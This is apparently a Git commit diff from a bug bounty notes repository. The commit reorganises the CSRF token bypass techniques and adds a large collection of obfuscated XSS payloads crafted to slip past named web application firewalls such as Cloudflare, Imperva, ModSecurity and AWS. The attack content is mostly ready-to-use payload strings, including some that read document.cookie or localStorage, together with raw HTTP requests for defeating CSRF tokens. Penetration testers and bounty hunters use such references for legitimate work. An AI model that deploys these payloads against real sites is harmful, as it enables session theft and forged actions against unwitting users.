mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 10:26:11 +00:00
feat: added XSS payloads to bypass WAF
This commit is contained in:
parent
5c6916174a
commit
4f51606813
@ -1,30 +0,0 @@
|
|||||||
# Bypass 304 (Not Modified)
|
|
||||||
|
|
||||||
1. Delete "If-None-Match" header
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
```
|
|
||||||
|
|
||||||
2. Adding random character in the end of "If-None-Match" header
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /admin HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
Host: target.com
|
|
||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
|
|
||||||
```
|
|
||||||
|
|
||||||
## References
|
|
||||||
* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
|
|
@ -1,120 +0,0 @@
|
|||||||
# Bypass CSRF
|
|
||||||
|
|
||||||
1. Change single character
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
|
||||||
```
|
|
||||||
|
|
||||||
2. Sending empty value of token
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=
|
|
||||||
```
|
|
||||||
|
|
||||||
3. Replace the token with same length
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaabaa
|
|
||||||
```
|
|
||||||
4. Changing POST / GET method
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
```
|
|
||||||
|
|
||||||
5. Remove the token from request
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456
|
|
||||||
```
|
|
||||||
|
|
||||||
6. Use another user's valid token
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
|
||||||
```
|
|
||||||
|
|
||||||
7. Try to decrypt hash
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=MTIzNDU2
|
|
||||||
```
|
|
||||||
MTIzNDU2 => 123456 with base64
|
|
||||||
|
|
||||||
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
|
||||||
```
|
|
||||||
When we register again, the request like this
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
...
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
|
||||||
```
|
|
||||||
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
|
@ -4,7 +4,7 @@
|
|||||||
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
||||||
|
|
||||||
## Where to find
|
## Where to find
|
||||||
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
|
||||||
|
|
||||||
## How to exploit
|
## How to exploit
|
||||||
1. HTML GET Method
|
1. HTML GET Method
|
||||||
@ -93,3 +93,125 @@ xhr.send('{"role":admin}');
|
|||||||
<br>
|
<br>
|
||||||
</body>
|
</body>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
# Bypass CSRF Token
|
||||||
|
But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
|
||||||
|
|
||||||
|
1. Change single character
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Sending empty value of token
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Replace the token with same length
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaabaa
|
||||||
|
```
|
||||||
|
4. Changing POST / GET method
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
|
5. Remove the token from request
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Use another user's valid token
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
||||||
|
```
|
||||||
|
|
||||||
|
7. Try to decrypt hash
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=MTIzNDU2
|
||||||
|
```
|
||||||
|
MTIzNDU2 => 123456 with base64
|
||||||
|
|
||||||
|
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
||||||
|
```
|
||||||
|
When we register again, the request like this
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
...
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
||||||
|
```
|
||||||
|
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
||||||
|
@ -344,31 +344,22 @@ javascript://%250Aalert(1)
|
|||||||
```
|
```
|
||||||
<svg%0Aonauxclick=0;[1].some(confirm)//
|
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||||
|
|
||||||
<svg onload=alert%26%230000000040"")>
|
<svg/onload={alert`1`}>
|
||||||
|
|
||||||
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||||
<svg onx=() onload=(confirm)(1)>
|
|
||||||
|
|
||||||
<svg onx=() onload=(confirm)(document.cookie)>
|
|
||||||
|
|
||||||
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
|
||||||
|
|
||||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|
||||||
|
|
||||||
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||||
|
|
||||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|
||||||
|
|
||||||
"><onx=[] onmouseover=prompt(1)>
|
"><onx=[] onmouseover=prompt(1)>
|
||||||
|
|
||||||
%2sscript%2ualert()%2s/script%2u -xss popup
|
%2sscript%2ualert()%2s/script%2u
|
||||||
|
|
||||||
<svg onload=alert%26%230000000040"1")>
|
|
||||||
|
|
||||||
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||||
|
|
||||||
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||||
|
|
||||||
|
<svg onload=alert%26%230000000040"1")>
|
||||||
|
|
||||||
<svg onload=prompt%26%230000000040document.domain)>
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
|
||||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||||
@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|||||||
|
|
||||||
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||||
|
|
||||||
|
<img ignored=() src=x onerror=prompt(1)>
|
||||||
|
|
||||||
|
<svg onx=() onload=(confirm)(1)>
|
||||||
|
|
||||||
|
<--`<img/src=` onerror=confirm``> --!>
|
||||||
|
|
||||||
|
<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
|
||||||
|
|
||||||
|
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
|
||||||
|
|
||||||
|
'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||||
|
|
||||||
|
'"><img/src/onerror=.1|alert``>
|
||||||
|
|
||||||
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||||
|
|
||||||
<img ignored=() src=x onerror=prompt(1)>
|
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||||
```
|
```
|
||||||
|
|
||||||
|
2. Cloudfront
|
||||||
|
```
|
||||||
|
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
|
||||||
|
|
||||||
|
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
|
||||||
|
|
||||||
|
"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Cloudbric
|
||||||
|
```
|
||||||
|
<a69/onclick=[1].findIndex(alert)>pew
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Comodo WAF
|
||||||
|
```
|
||||||
|
<input/oninput='new Function`confir\u006d\`0\``'>
|
||||||
|
|
||||||
|
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
|
||||||
|
```
|
||||||
|
|
||||||
|
5. ModSecurity
|
||||||
|
```
|
||||||
|
<a href="jav%0Dascript:alert(1)">
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Imperva
|
||||||
|
```
|
||||||
|
<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
|
||||||
|
|
||||||
|
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
|
||||||
|
|
||||||
|
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
|
||||||
|
|
||||||
|
<a69/onclick=write()>pew
|
||||||
|
|
||||||
|
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
|
||||||
|
|
||||||
|
<svg onload\r\n=$.globalEval("al"+"ert()");>
|
||||||
|
|
||||||
|
<svg/onload=self[`aler`%2b`t`]`1`>
|
||||||
|
|
||||||
|
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
||||||
|
|
||||||
|
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
||||||
|
|
||||||
|
<img/src=q onerror='new Function`al\ert\`1\``'>
|
||||||
|
|
||||||
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
|
```
|
||||||
|
|
||||||
|
7. AWS
|
||||||
|
```
|
||||||
|
<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
|
||||||
|
|
||||||
## References
|
## References
|
||||||
- [Brute Logic](https://brutelogic.com.br/)
|
- [Brute Logic](https://brutelogic.com.br/)
|
||||||
|
- [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
|
||||||
- Some random twitter posts
|
- Some random twitter posts
|
10
README.md
10
README.md
@ -22,7 +22,9 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||||
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
|
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
|
||||||
|
- [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
|
||||||
- SQL Injection (SOON)
|
- SQL Injection (SOON)
|
||||||
|
- [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
|
||||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||||
|
|
||||||
## Checklist
|
## Checklist
|
||||||
@ -32,10 +34,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
## List Bypass
|
## List Bypass
|
||||||
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
||||||
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
||||||
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
|
||||||
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
||||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||||
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
|
||||||
|
|
||||||
## Miscellaneous
|
## Miscellaneous
|
||||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||||
@ -50,11 +50,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
|
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
|
||||||
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
||||||
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
||||||
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
|
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
|
||||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
|
||||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
|
||||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
|
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
|
||||||
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
||||||
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
|
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
|
||||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
|
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
|
||||||
@ -69,5 +69,5 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [ ] Tidy up the reconnaisance folder
|
- [ ] Tidy up the reconnaisance folder
|
||||||
- [ ] Seperate the bypass from some vulnerability readme
|
- [ ] Seperate the bypass from some vulnerability readme
|
||||||
- [ ] Writes multiple payload bypasses for each vulnerability
|
- [ ] Writes multiple payload bypasses for each vulnerability
|
||||||
- [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
|
- [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
|
||||||
- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)
|
- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)
|
Loading…
Reference in New Issue
Block a user